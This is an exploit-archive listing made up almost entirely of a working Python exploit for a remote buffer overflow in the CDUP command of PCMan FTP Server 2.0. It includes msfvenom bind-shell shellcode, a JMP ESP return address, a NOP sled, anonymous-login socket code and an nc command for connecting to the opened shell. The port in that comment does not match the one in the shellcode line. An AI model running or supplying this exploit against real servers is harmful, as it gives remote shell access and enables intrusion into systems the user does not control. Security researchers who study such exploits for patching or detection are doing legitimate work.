PCMan FTP Server 2.0 CDUP Remote Buffer Overflow

PCMan FTP Server version 2.0 CDUP remote buffer overflow exploit.


MD5 | db06526f034129dc1fe951edae491f7a

#!/usr/bin/python
import socket, sys, os, time

print "\n===============================\n"
print " PCMan FTP Server 2.0 - 'CDUP' Remote Buffer Overflow \n "
print " Date: 23/03/2019 \n "
print " Affected Software: PCMan 2.0 \n "
print " Tested on Mincrsoft Windows XP Professional Version 2002 SP2 \n "
print " Author: Sachin Wagh \n "
print " Twitter: @tiger_tigerboy \n "
print "=================================\n"

#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
#nc taget_ip 4444

shellcode=("\xbb\xb6\x9b\xb7\xa8\xda\xdf\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x53\x83\xea\xfc\x31\x5a\x0e\x03\xec\x95\x55\x5d\xec\x42\x1b"
"\x9e\x0c\x93\x7c\x16\xe9\xa2\xbc\x4c\x7a\x94\x0c\x06\x2e\x19"
"\xe6\x4a\xda\xaa\x8a\x42\xed\x1b\x20\xb5\xc0\x9c\x19\x85\x43"
"\x1f\x60\xda\xa3\x1e\xab\x2f\xa2\x67\xd6\xc2\xf6\x30\x9c\x71"
"\xe6\x35\xe8\x49\x8d\x06\xfc\xc9\x72\xde\xff\xf8\x25\x54\xa6"
"\xda\xc4\xb9\xd2\x52\xde\xde\xdf\x2d\x55\x14\xab\xaf\xbf\x64"
"\x54\x03\xfe\x48\xa7\x5d\xc7\x6f\x58\x28\x31\x8c\xe5\x2b\x86"
"\xee\x31\xb9\x1c\x48\xb1\x19\xf8\x68\x16\xff\x8b\x67\xd3\x8b"
"\xd3\x6b\xe2\x58\x68\x97\x6f\x5f\xbe\x11\x2b\x44\x1a\x79\xef"
"\xe5\x3b\x27\x5e\x19\x5b\x88\x3f\xbf\x10\x25\x2b\xb2\x7b\x22"
"\x98\xff\x83\xb2\xb6\x88\xf0\x80\x19\x23\x9e\xa8\xd2\xed\x59"
"\xce\xc8\x4a\xf5\x31\xf3\xaa\xdc\xf5\xa7\xfa\x76\xdf\xc7\x90"
"\x86\xe0\x1d\x0c\x8e\x47\xce\x33\x73\x37\xbe\xf3\xdb\xd0\xd4"
"\xfb\x04\xc0\xd6\xd1\x2d\x69\x2b\xda\x40\x36\xa2\x3c\x08\xd6"
"\xe2\x97\xa4\x14\xd1\x2f\x53\x66\x33\x18\xf3\x2f\x55\x9f\xfc"
"\xaf\x73\xb7\x6a\x24\x90\x03\x8b\x3b\xbd\x23\xdc\xac\x4b\xa2"
"\xaf\x4d\x4b\xef\x47\xed\xde\x74\x97\x78\xc3\x22\xc0\x2d\x35"
"\x3b\x84\xc3\x6c\x95\xba\x19\xe8\xde\x7e\xc6\xc9\xe1\x7f\x8b"
"\x76\xc6\x6f\x55\x76\x42\xdb\x09\x21\x1c\xb5\xef\x9b\xee\x6f"
"\xa6\x70\xb9\xe7\x3f\xbb\x7a\x71\x40\x96\x0c\x9d\xf1\x4f\x49"
"\xa2\x3e\x18\x5d\xdb\x22\xb8\xa2\x36\xe7\xc8\xe8\x1a\x4e\x41"
"\xb5\xcf\xd2\x0c\x46\x3a\x10\x29\xc5\xce\xe9\xce\xd5\xbb\xec")

target = sys.argv[1]
port = int(sys.argv[2])

evil="A"*2006
evil+="\x27\xb1\xfa\x77" #SHLWAPI.dll this dll have to JMP to ESP address
evil+="\x90"*20
evil+=shellcode
#evil+="\x90"*(2220-len(evil))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port)) #Connect to FTP server
s.recv(1024) #Receive 1024 bytes from FTP server
print "[+] Payload Sent Successfully"
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('CDUP ' + evil + '\r\n') #Send CDUP vulnerable command with our evil data
s.recv(1024)
s.close() #Close the socket

Related Posts